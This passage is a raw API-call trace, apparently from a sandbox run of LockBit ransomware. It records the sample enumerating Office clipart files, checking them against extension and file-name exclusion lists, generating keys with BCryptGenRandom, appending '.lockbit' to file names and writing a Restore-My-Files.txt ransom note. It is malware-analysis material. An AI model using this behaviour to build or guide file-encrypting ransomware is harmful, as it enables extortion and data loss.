lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.719] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.720] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.720] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153091.WMF") returned 1 [0146.721] lstrcmpiW (lpString1="ntldr", lpString2="J0153091.WMF") returned 1 [0146.721] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153091.WMF") returned 1 [0146.721] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153091.WMF") returned -1 [0146.721] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153091.WMF") returned -1 [0146.721] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153091.WMF") returned 1 [0146.721] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153091.WMF") returned -1 [0146.721] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.721] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned=".WMF" [0146.721] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.721] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.721] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.722] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.722] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF.lockbit") returned 72 [0146.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.724] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.725] malloc (_Size=0x40068) returned 0x3df0008 [0146.725] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8136) returned 1 [0146.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.726] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.726] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.731] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.731] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.732] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.732] free (_Block=0x1fa2ed8) [0146.732] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.732] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.732] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.732] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x22b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153093.WMF", cAlternateFileName="")) returned 1 [0146.732] lstrcmpiW (lpString1=".", lpString2="J0153093.WMF") returned -1 [0146.732] lstrcmpiW (lpString1="..", lpString2="J0153093.WMF") returned -1 [0146.732] PathFindExtensionW (pszPath="J0153093.WMF") returned=".WMF" [0146.733] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.733] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.734] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.734] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153093.WMF") returned 1 [0146.734] lstrcmpiW (lpString1="ntldr", lpString2="J0153093.WMF") returned 1 [0146.734] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153093.WMF") returned 1 [0146.734] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153093.WMF") returned -1 [0146.735] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153093.WMF") returned -1 [0146.735] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153093.WMF") returned 1 [0146.735] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153093.WMF") returned -1 [0146.735] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.735] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned=".WMF" [0146.735] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.735] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.735] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.736] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.736] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF.lockbit") returned 72 [0146.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.737] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.737] malloc (_Size=0x40068) returned 0x3df0008 [0146.737] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8880) returned 1 [0146.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.738] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.739] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.739] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.744] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.744] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0146.745] free (_Block=0x1fa2ed8) [0146.745] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.745] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.745] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.745] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56478790, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe78, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0153095.WMF", cAlternateFileName="")) returned 1 [0146.745] lstrcmpiW (lpString1=".", lpString2="J0153095.WMF") returned -1 [0146.745] lstrcmpiW (lpString1="..", lpString2="J0153095.WMF") returned -1 [0146.745] PathFindExtensionW (pszPath="J0153095.WMF") returned=".WMF" [0146.746] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.746] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.747] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.747] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0153095.WMF") returned 1 [0146.748] lstrcmpiW (lpString1="ntldr", lpString2="J0153095.WMF") returned 1 [0146.748] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0153095.WMF") returned 1 [0146.748] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0153095.WMF") returned -1 [0146.748] lstrcmpiW (lpString1="autorun.inf", lpString2="J0153095.WMF") returned -1 [0146.748] lstrcmpiW (lpString1="thumbs.db", lpString2="J0153095.WMF") returned 1 [0146.748] lstrcmpiW (lpString1="iconcache.db", lpString2="J0153095.WMF") returned -1 [0146.748] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.748] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned=".WMF" [0146.748] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.748] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.748] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.749] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.749] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF.lockbit") returned 72 [0146.749] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf"), 